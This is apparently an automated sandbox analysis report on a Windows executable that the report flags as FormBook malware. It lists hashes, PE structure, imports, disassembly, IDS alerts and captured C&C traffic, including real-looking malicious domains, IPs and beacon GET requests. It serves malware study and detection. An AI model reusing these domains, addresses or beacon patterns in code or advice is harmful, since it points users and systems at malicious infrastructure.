                                            Amaury.vanvinckenroye-AudioMessage_520498.htmGet hashmaliciousBrowse
                                            • 13.224.96.22
                                            INV NO-1820000514 USD 270,294.pdf.exeGet hashmaliciousBrowse
                                            • 13.233.152.221
                                            CyLELjM5zk.exeGet hashmaliciousBrowse
                                            • 52.219.8.114
                                            gunzipped.exeGet hashmaliciousBrowse
                                            • 3.142.167.4
                                            NEW ORDER.xlsxGet hashmaliciousBrowse
                                            • 52.58.78.16
                                            Click_me_to_install_SnapTube_tube_apkpure_dl.apkGet hashmaliciousBrowse
                                            • 52.222.158.105

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            No created / dropped files found

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):7.1527685601415545
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:mvui1vY6Mo.exe
                                            File size:367359
                                            MD5:059b1244ac9fda54de086692db4b5a08
                                            SHA1:6e5f6326bd9da7e5d9c70b3e4491d308eb7f842b
                                            SHA256:abb29be2c1eccd851bdb99b126e822a8cf0f57be95e9b71a921aa703b2c285be
                                            SHA512:513dabdcc13cd81b8be8cf9076862c5f0418d267ed7f6d9e1b7f008aa2f5cb7928ad8fc8a41b69a872d516f771098bd1d83eca86b9dd61b49332527d43e8427f
                                            SSDEEP:6144:GCeJWu3gGB7g1TaqXp/bTLwlLGX7lQtbzRuYqCRxPi4f+99:uWcgGCTaqXhKLGEvRrnm99
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T7`=.V.n.V.n.V.n...n.V.n...njV.n...n.V.n+..o.V.n+..o.V.n+..o.V.n...n.V.n.V.nmV.n...o.V.n...n.V.n.V.n.V.n...o.V.nRich.V.n.......

                                            File Icon

                                            Icon Hash:16232b2b33313300

                                            Static PE Info

                                            General

                                            Entrypoint:0x401226
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                            DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                            Time Stamp:0x610728B8 [Sun Aug 1 23:05:28 2021 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:6
                                            OS Version Minor:0
                                            File Version Major:6
                                            File Version Minor:0
                                            Subsystem Version Major:6
                                            Subsystem Version Minor:0
                                            Import Hash:589aee860f84814af33b4e1068b97d01

                                            Entrypoint Preview

                                            Instruction
                                            call 00007F8888C3355Fh
                                            jmp 00007F8888C33163h
                                            push ebp
                                            mov ebp, esp
                                            mov eax, dword ptr [00414018h]
                                            and eax, 1Fh
                                            push 00000020h
                                            pop ecx
                                            sub ecx, eax
                                            mov eax, dword ptr [ebp+08h]
                                            ror eax, cl
                                            xor eax, dword ptr [00414018h]
                                            pop ebp
                                            ret
                                            push ebp
                                            mov ebp, esp
                                            mov eax, dword ptr [ebp+08h]
                                            push esi
                                            mov ecx, dword ptr [eax+3Ch]
                                            add ecx, eax
                                            movzx eax, word ptr [ecx+14h]
                                            lea edx, dword ptr [ecx+18h]
                                            add edx, eax
                                            movzx eax, word ptr [ecx+06h]
                                            imul esi, eax, 28h
                                            add esi, edx
                                            cmp edx, esi
                                            je 00007F8888C332EBh
                                            mov ecx, dword ptr [ebp+0Ch]
                                            cmp ecx, dword ptr [edx+0Ch]
                                            jc 00007F8888C332DCh
                                            mov eax, dword ptr [edx+08h]
                                            add eax, dword ptr [edx+0Ch]
                                            cmp ecx, eax
                                            jc 00007F8888C332DEh
                                            add edx, 28h
                                            cmp edx, esi
                                            jne 00007F8888C332BCh
                                            xor eax, eax
                                            pop esi
                                            pop ebp
                                            ret
                                            mov eax, edx
                                            jmp 00007F8888C332CBh
                                            call 00007F8888C33A04h
                                            test eax, eax
                                            jne 00007F8888C332D5h
                                            xor al, al
                                            ret
                                            mov eax, dword ptr fs:[00000018h]
                                            push esi
                                            mov esi, 00414E24h
                                            mov edx, dword ptr [eax+04h]
                                            jmp 00007F8888C332D6h
                                            cmp edx, eax
                                            je 00007F8888C332E2h
                                            xor eax, eax
                                            mov ecx, edx
                                            lock cmpxchg dword ptr [esi], ecx
                                            test eax, eax
                                            jne 00007F8888C332C2h
                                            xor al, al
                                            pop esi
                                            ret
                                            mov al, 01h
                                            pop esi
                                            ret
                                            push ebp
                                            mov ebp, esp
                                            cmp dword ptr [ebp+08h], 00000000h
                                            jne 00007F8888C332D9h
                                            mov byte ptr [00414E40h], 00000001h
                                            call 00007F8888C33825h
                                            call 00007F8888C33CABh
                                            test al, al
                                            jne 00007F8888C332D6h
                                            xor al, al
                                            pop ebp
                                            ret
                                            call 00007F8888C35585h

                                            Rich Headers

                                            Programming Language:
                                            • [LNK] VS2015 UPD3.1 build 24215
                                            • [RES] VS2015 UPD3 build 24213

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x1318c0x64.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x170000xeb38.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x260000x107c.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x12a300x54.rdata
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x12a880x40.rdata
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0xe0000x1a8.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000xc7270xc800False0.55521484375data6.58406005162IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .rdata0xe0000x5ac60x5c00False0.422299592391data4.93015425606IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0x140000x19c80x1000False0.313232421875DOS executable (block device driver \277DN)3.41532208548IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                            .gfids0x160000xac0x200False0.28125data1.44064934011IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .rsrc0x170000xeb380xec00False0.0876423463983data1.8711448419IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x260000x107c0x1200False0.769097222222data6.36802237044IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountry
                                            RT_ICON0x170f00xe8acdataEnglishUnited States
                                            RT_GROUP_ICON0x259a00x14dataEnglishUnited States
                                            RT_MANIFEST0x259b80x17dXML 1.0 document textEnglishUnited States

                                            Imports

                                            DLLImport
                                            KERNEL32.dllSetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap, HeapSize, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, DecodePointer, VirtualProtect, CloseHandle, EnumLanguageGroupLocalesW, CreateFileW, LCMapStringW, WriteFile, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, GetCurrentProcess, TerminateProcess, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, GetModuleFileNameW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, HeapFree, HeapAlloc, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, RaiseException
                                            USER32.dllGetMessageW, DefWindowProcW, DestroyWindow, DispatchMessageW, TranslateMessage, LoadCursorW, GetClientRect, PostQuitMessage, InvalidateRect, BeginPaint, EndPaint, CreateWindowExW, RegisterClassExW, RegisterClassW, SetMenu, AppendMenuW, GetSysColorBrush, CreateMenu, GetDC, ReleaseDC
                                            GDI32.dllCreateCompatibleBitmap, CreateCompatibleDC, SetBkColor, SetROP2, ExtTextOutW, GetStockObject, SelectObject, SetPixel, ExtFloodFill, GetDIBits, GetPixel, GetObjectW, DeleteObject, CreateSolidBrush, BitBlt
                                            COMDLG32.dllChooseColorW, GetOpenFileNameW

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            08/03/21-22:19:24.418538TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974780192.168.2.4164.68.104.58
                                            08/03/21-22:19:24.418538TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974780192.168.2.4164.68.104.58
                                            08/03/21-22:19:24.418538TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974780192.168.2.4164.68.104.58
                                            08/03/21-22:20:17.186369TCP1201ATTACK-RESPONSES 403 Forbidden804976023.227.38.74192.168.2.4

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Aug 3, 2021 22:19:24.390264034 CEST4974780192.168.2.4164.68.104.58
                                            Aug 3, 2021 22:19:24.418199062 CEST8049747164.68.104.58192.168.2.4
                                            Aug 3, 2021 22:19:24.418390036 CEST4974780192.168.2.4164.68.104.58
                                            Aug 3, 2021 22:19:24.418538094 CEST4974780192.168.2.4164.68.104.58
                                            Aug 3, 2021 22:19:24.449351072 CEST8049747164.68.104.58192.168.2.4
                                            Aug 3, 2021 22:19:24.652371883 CEST8049747164.68.104.58192.168.2.4
                                            Aug 3, 2021 22:19:24.652398109 CEST8049747164.68.104.58192.168.2.4
                                            Aug 3, 2021 22:19:24.652532101 CEST4974780192.168.2.4164.68.104.58
                                            Aug 3, 2021 22:19:24.652604103 CEST4974780192.168.2.4164.68.104.58
                                            Aug 3, 2021 22:19:24.680361986 CEST8049747164.68.104.58192.168.2.4
                                            Aug 3, 2021 22:19:29.706634998 CEST4974880192.168.2.452.58.78.16
                                            Aug 3, 2021 22:19:29.724163055 CEST804974852.58.78.16192.168.2.4
                                            Aug 3, 2021 22:19:29.724359989 CEST4974880192.168.2.452.58.78.16
                                            Aug 3, 2021 22:19:29.724525928 CEST4974880192.168.2.452.58.78.16
                                            Aug 3, 2021 22:19:29.741926908 CEST804974852.58.78.16192.168.2.4
                                            Aug 3, 2021 22:19:29.741950989 CEST804974852.58.78.16192.168.2.4
                                            Aug 3, 2021 22:19:29.741966009 CEST804974852.58.78.16192.168.2.4
                                            Aug 3, 2021 22:19:29.742088079 CEST4974880192.168.2.452.58.78.16
                                            Aug 3, 2021 22:19:29.742151976 CEST4974880192.168.2.452.58.78.16
                                            Aug 3, 2021 22:19:29.759646893 CEST804974852.58.78.16192.168.2.4
                                            Aug 3, 2021 22:19:34.796736956 CEST4975480192.168.2.4163.123.204.26
                                            Aug 3, 2021 22:19:34.934947968 CEST8049754163.123.204.26192.168.2.4
                                            Aug 3, 2021 22:19:34.935086012 CEST4975480192.168.2.4163.123.204.26
                                            Aug 3, 2021 22:19:34.935245991 CEST4975480192.168.2.4163.123.204.26
                                            Aug 3, 2021 22:19:35.073268890 CEST8049754163.123.204.26192.168.2.4
                                            Aug 3, 2021 22:19:35.076021910 CEST8049754163.123.204.26192.168.2.4
                                            Aug 3, 2021 22:19:35.076055050 CEST8049754163.123.204.26192.168.2.4
                                            Aug 3, 2021 22:19:35.076257944 CEST4975480192.168.2.4163.123.204.26
                                            Aug 3, 2021 22:19:35.076282024 CEST4975480192.168.2.4163.123.204.26
                                            Aug 3, 2021 22:19:35.214565992 CEST8049754163.123.204.26192.168.2.4
                                            Aug 3, 2021 22:19:40.149452925 CEST4975580192.168.2.4198.74.106.237
                                            Aug 3, 2021 22:19:40.323643923 CEST8049755198.74.106.237192.168.2.4
                                            Aug 3, 2021 22:19:40.323803902 CEST4975580192.168.2.4198.74.106.237
                                            Aug 3, 2021 22:19:40.323954105 CEST4975580192.168.2.4198.74.106.237
                                            Aug 3, 2021 22:19:40.497961998 CEST8049755198.74.106.237192.168.2.4
                                            Aug 3, 2021 22:19:40.547720909 CEST8049755198.74.106.237192.168.2.4
                                            Aug 3, 2021 22:19:40.547755003 CEST8049755198.74.106.237192.168.2.4
                                            Aug 3, 2021 22:19:40.547775030 CEST8049755198.74.106.237192.168.2.4
                                            Aug 3, 2021 22:19:40.547797918 CEST8049755198.74.106.237192.168.2.4
                                            Aug 3, 2021 22:19:40.547816038 CEST8049755198.74.106.237192.168.2.4
                                            Aug 3, 2021 22:19:40.547830105 CEST8049755198.74.106.237192.168.2.4
                                            Aug 3, 2021 22:19:40.547919035 CEST4975580192.168.2.4198.74.106.237
                                            Aug 3, 2021 22:19:40.548029900 CEST4975580192.168.2.4198.74.106.237
                                            Aug 3, 2021 22:19:40.548136950 CEST4975580192.168.2.4198.74.106.237
                                            Aug 3, 2021 22:19:40.723388910 CEST8049755198.74.106.237192.168.2.4
                                            Aug 3, 2021 22:19:45.980710030 CEST4975680192.168.2.4103.88.34.80
                                            Aug 3, 2021 22:19:48.990536928 CEST4975680192.168.2.4103.88.34.80
                                            Aug 3, 2021 22:19:55.006757021 CEST4975680192.168.2.4103.88.34.80
                                            Aug 3, 2021 22:20:08.798780918 CEST4975980192.168.2.4103.88.34.80
                                            Aug 3, 2021 22:20:11.804847002 CEST4975980192.168.2.4103.88.34.80
                                            Aug 3, 2021 22:20:17.805396080 CEST4975980192.168.2.4103.88.34.80

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Aug 3, 2021 22:18:02.405987024 CEST53497148.8.8.8192.168.2.4
                                            Aug 3, 2021 22:18:02.449356079 CEST5802853192.168.2.48.8.8.8
                                            Aug 3, 2021 22:18:02.476893902 CEST53580288.8.8.8192.168.2.4
                                            Aug 3, 2021 22:18:03.138885021 CEST5309753192.168.2.48.8.8.8
                                            Aug 3, 2021 22:18:03.171201944 CEST53530978.8.8.8192.168.2.4
                                            Aug 3, 2021 22:18:03.955722094 CEST4925753192.168.2.48.8.8.8
                                            Aug 3, 2021 22:18:03.991257906 CEST53492578.8.8.8192.168.2.4
                                            Aug 3, 2021 22:18:04.248619080 CEST6238953192.168.2.48.8.8.8
                                            Aug 3, 2021 22:18:04.286288977 CEST53623898.8.8.8192.168.2.4
                                            Aug 3, 2021 22:18:04.579786062 CEST4991053192.168.2.48.8.8.8
                                            Aug 3, 2021 22:18:04.604487896 CEST53499108.8.8.8192.168.2.4
                                            Aug 3, 2021 22:18:05.596151114 CEST5585453192.168.2.48.8.8.8
                                            Aug 3, 2021 22:18:05.624344110 CEST53558548.8.8.8192.168.2.4
                                            Aug 3, 2021 22:18:06.369427919 CEST6454953192.168.2.48.8.8.8
                                            Aug 3, 2021 22:18:06.396821022 CEST53645498.8.8.8192.168.2.4
                                            Aug 3, 2021 22:18:07.410661936 CEST6315353192.168.2.48.8.8.8
                                            Aug 3, 2021 22:18:07.438966990 CEST53631538.8.8.8192.168.2.4
                                            Aug 3, 2021 22:18:08.119298935 CEST5299153192.168.2.48.8.8.8
                                            Aug 3, 2021 22:18:08.144279957 CEST53529918.8.8.8192.168.2.4
                                            Aug 3, 2021 22:18:08.962778091 CEST5370053192.168.2.48.8.8.8
                                            Aug 3, 2021 22:18:08.988687992 CEST53537008.8.8.8192.168.2.4
                                            Aug 3, 2021 22:18:10.738295078 CEST5172653192.168.2.48.8.8.8
                                            Aug 3, 2021 22:18:10.763365030 CEST53517268.8.8.8192.168.2.4
                                            Aug 3, 2021 22:18:11.391449928 CEST5679453192.168.2.48.8.8.8
                                            Aug 3, 2021 22:18:11.418932915 CEST53567948.8.8.8192.168.2.4
                                            Aug 3, 2021 22:18:12.993232012 CEST5653453192.168.2.48.8.8.8
                                            Aug 3, 2021 22:18:13.025767088 CEST53565348.8.8.8192.168.2.4
                                            Aug 3, 2021 22:18:15.728723049 CEST5662753192.168.2.48.8.8.8
                                            Aug 3, 2021 22:18:15.763833046 CEST53566278.8.8.8192.168.2.4
                                            Aug 3, 2021 22:18:16.562700987 CEST5662153192.168.2.48.8.8.8
                                            Aug 3, 2021 22:18:16.587393999 CEST53566218.8.8.8192.168.2.4
                                            Aug 3, 2021 22:18:18.197205067 CEST6311653192.168.2.48.8.8.8
                                            Aug 3, 2021 22:18:18.232480049 CEST53631168.8.8.8192.168.2.4
                                            Aug 3, 2021 22:18:19.041738033 CEST6407853192.168.2.48.8.8.8
                                            Aug 3, 2021 22:18:19.069494009 CEST53640788.8.8.8192.168.2.4
                                            Aug 3, 2021 22:18:19.759186983 CEST6480153192.168.2.48.8.8.8
                                            Aug 3, 2021 22:18:19.784358978 CEST53648018.8.8.8192.168.2.4
                                            Aug 3, 2021 22:18:20.471590042 CEST6172153192.168.2.48.8.8.8
                                            Aug 3, 2021 22:18:20.500682116 CEST53617218.8.8.8192.168.2.4
                                            Aug 3, 2021 22:18:38.410734892 CEST5125553192.168.2.48.8.8.8
                                            Aug 3, 2021 22:18:38.452064991 CEST53512558.8.8.8192.168.2.4
                                            Aug 3, 2021 22:18:57.129854918 CEST6152253192.168.2.48.8.8.8
                                            Aug 3, 2021 22:18:57.165270090 CEST53615228.8.8.8192.168.2.4
                                            Aug 3, 2021 22:19:22.344090939 CEST5233753192.168.2.48.8.8.8
                                            Aug 3, 2021 22:19:22.389576912 CEST53523378.8.8.8192.168.2.4
                                            Aug 3, 2021 22:19:24.335433006 CEST5504653192.168.2.48.8.8.8
                                            Aug 3, 2021 22:19:24.385238886 CEST53550468.8.8.8192.168.2.4
                                            Aug 3, 2021 22:19:29.665224075 CEST4961253192.168.2.48.8.8.8
                                            Aug 3, 2021 22:19:29.705188990 CEST53496128.8.8.8192.168.2.4
                                            Aug 3, 2021 22:19:31.378773928 CEST4928553192.168.2.48.8.8.8
                                            Aug 3, 2021 22:19:31.414267063 CEST53492858.8.8.8192.168.2.4
                                            Aug 3, 2021 22:19:34.758735895 CEST5060153192.168.2.48.8.8.8
                                            Aug 3, 2021 22:19:34.795322895 CEST53506018.8.8.8192.168.2.4
                                            Aug 3, 2021 22:19:40.112061024 CEST6087553192.168.2.48.8.8.8
                                            Aug 3, 2021 22:19:40.148045063 CEST53608758.8.8.8192.168.2.4
                                            Aug 3, 2021 22:19:45.557126045 CEST5644853192.168.2.48.8.8.8
                                            Aug 3, 2021 22:19:45.978787899 CEST53564488.8.8.8192.168.2.4
                                            Aug 3, 2021 22:19:57.383922100 CEST5917253192.168.2.48.8.8.8
                                            Aug 3, 2021 22:19:57.420855045 CEST53591728.8.8.8192.168.2.4
                                            Aug 3, 2021 22:19:58.751995087 CEST6242053192.168.2.48.8.8.8
                                            Aug 3, 2021 22:19:58.800821066 CEST53624208.8.8.8192.168.2.4
                                            Aug 3, 2021 22:20:08.440460920 CEST6057953192.168.2.48.8.8.8
                                            Aug 3, 2021 22:20:08.782097101 CEST53605798.8.8.8192.168.2.4
                                            Aug 3, 2021 22:20:17.044122934 CEST5018353192.168.2.48.8.8.8
                                            Aug 3, 2021 22:20:17.088299990 CEST53501838.8.8.8192.168.2.4

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Aug 3, 2021 22:19:24.335433006 CEST192.168.2.48.8.8.80xec26Standard query (0)www.ejsuniqueclasses.comA (IP address)IN (0x0001)
                                            Aug 3, 2021 22:19:29.665224075 CEST192.168.2.48.8.8.80x749fStandard query (0)www.healthpragency.comA (IP address)IN (0x0001)
                                            Aug 3, 2021 22:19:34.758735895 CEST192.168.2.48.8.8.80x1331Standard query (0)www.circusocks.comA (IP address)IN (0x0001)
                                            Aug 3, 2021 22:19:40.112061024 CEST192.168.2.48.8.8.80x7a36Standard query (0)www.466se.comA (IP address)IN (0x0001)
                                            Aug 3, 2021 22:19:45.557126045 CEST192.168.2.48.8.8.80x74b5Standard query (0)www.856380062.xyzA (IP address)IN (0x0001)
                                            Aug 3, 2021 22:20:08.440460920 CEST192.168.2.48.8.8.80x915Standard query (0)www.856380062.xyzA (IP address)IN (0x0001)
                                            Aug 3, 2021 22:20:17.044122934 CEST192.168.2.48.8.8.80xb21eStandard query (0)www.comparaca.comA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Aug 3, 2021 22:19:24.385238886 CEST8.8.8.8192.168.2.40xec26No error (0)www.ejsuniqueclasses.comejsuniqueclasses.comCNAME (Canonical name)IN (0x0001)
                                            Aug 3, 2021 22:19:24.385238886 CEST8.8.8.8192.168.2.40xec26No error (0)ejsuniqueclasses.com164.68.104.58A (IP address)IN (0x0001)
                                            Aug 3, 2021 22:19:29.705188990 CEST8.8.8.8192.168.2.40x749fNo error (0)www.healthpragency.com52.58.78.16A (IP address)IN (0x0001)
                                            Aug 3, 2021 22:19:34.795322895 CEST8.8.8.8192.168.2.40x1331No error (0)www.circusocks.comcircusocks.comCNAME (Canonical name)IN (0x0001)
                                            Aug 3, 2021 22:19:34.795322895 CEST8.8.8.8192.168.2.40x1331No error (0)circusocks.com163.123.204.26A (IP address)IN (0x0001)
                                            Aug 3, 2021 22:19:40.148045063 CEST8.8.8.8192.168.2.40x7a36No error (0)www.466se.com198.74.106.237A (IP address)IN (0x0001)
                                            Aug 3, 2021 22:19:45.978787899 CEST8.8.8.8192.168.2.40x74b5No error (0)www.856380062.xyz103.88.34.80A (IP address)IN (0x0001)
                                            Aug 3, 2021 22:20:08.782097101 CEST8.8.8.8192.168.2.40x915No error (0)www.856380062.xyz103.88.34.80A (IP address)IN (0x0001)
                                            Aug 3, 2021 22:20:17.088299990 CEST8.8.8.8192.168.2.40xb21eNo error (0)www.comparaca.comcomparaca.myshopify.comCNAME (Canonical name)IN (0x0001)
                                            Aug 3, 2021 22:20:17.088299990 CEST8.8.8.8192.168.2.40xb21eNo error (0)comparaca.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                            Aug 3, 2021 22:20:17.088299990 CEST8.8.8.8192.168.2.40xb21eNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • www.ejsuniqueclasses.com
                                            • www.healthpragency.com
                                            • www.circusocks.com
                                            • www.466se.com

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.449747164.68.104.5880C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Aug 3, 2021 22:19:24.418538094 CEST1218OUTGET /ehp9/?zZbXur=fPkLdxO&0vrPA=8c/5QoMWiMUW3SjDqDOgvqNfypt6IHckOwJjeT/c3u4BTCnBI4ecsnyb0a1UBRXLCY1T HTTP/1.1
                                            Host: www.ejsuniqueclasses.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Aug 3, 2021 22:19:24.652371883 CEST1219INHTTP/1.1 301 Moved Permanently
                                            Date: Tue, 03 Aug 2021 20:19:24 GMT
                                            Server: Apache
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            X-Redirect-By: WordPress
                                            Location: http://ejsuniqueclasses.com/ehp9/?zZbXur=fPkLdxO&0vrPA=8c/5QoMWiMUW3SjDqDOgvqNfypt6IHckOwJjeT/c3u4BTCnBI4ecsnyb0a1UBRXLCY1T
                                            Content-Length: 0
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.44974852.58.78.1680C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Aug 3, 2021 22:19:29.724525928 CEST1220OUTGET /ehp9/?0vrPA=5Xsjz7+Z5WLh89j81EYl3Aroso+z/qN2CpRl0IKGrQQKTktOwLuaqldWAZoOLzUBzR5Q&zZbXur=fPkLdxO HTTP/1.1
                                            Host: www.healthpragency.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Aug 3, 2021 22:19:29.741950989 CEST1220INHTTP/1.1 410 Gone
                                            Server: openresty
                                            Date: Tue, 03 Aug 2021 20:19:22 GMT
                                            Content-Type: text/html
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 32 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 68 65 61 6c 74 68 70 72 61 67 65 6e 63 79 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 65 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 68 65 61 6c 74 68 70 72 61 67 65 6e 63 79 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7<html>9 <head>52 <meta http-equiv='refresh' content='5; url=http://www.healthpragency.com/' />a </head>9 <body>3e You are being redirected to http://www.healthpragency.coma </body>8</html>0


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            2192.168.2.449754163.123.204.2680C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Aug 3, 2021 22:19:34.935245991 CEST4475OUTGET /ehp9/?zZbXur=fPkLdxO&0vrPA=oRr9ZXza/sqKFb1a4cLVquMpSAfNXH/ZGOEKtA079HuOHtafooLLPyAXrAQLja/+16Ky HTTP/1.1
                                            Host: www.circusocks.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Aug 3, 2021 22:19:35.076021910 CEST4476INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0
                                            Date: Tue, 03 Aug 2021 20:19:35 GMT
                                            Content-Type: text/html; charset=iso-8859-1
                                            Content-Length: 196
                                            Connection: close
                                            X-XSS-Protection: 1; mode=block
                                            X-Content-Type-Options: nosniff
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            3192.168.2.449755198.74.106.23780C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Aug 3, 2021 22:19:40.323954105 CEST4476OUTGET /ehp9/?0vrPA=UsPTfcJ0BZ5q3mR+pFMXthX3126RUWmODdEpc4rh++F4qt19VniXLc7dOQb8qNRTbKnv&zZbXur=fPkLdxO HTTP/1.1
                                            Host: www.466se.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
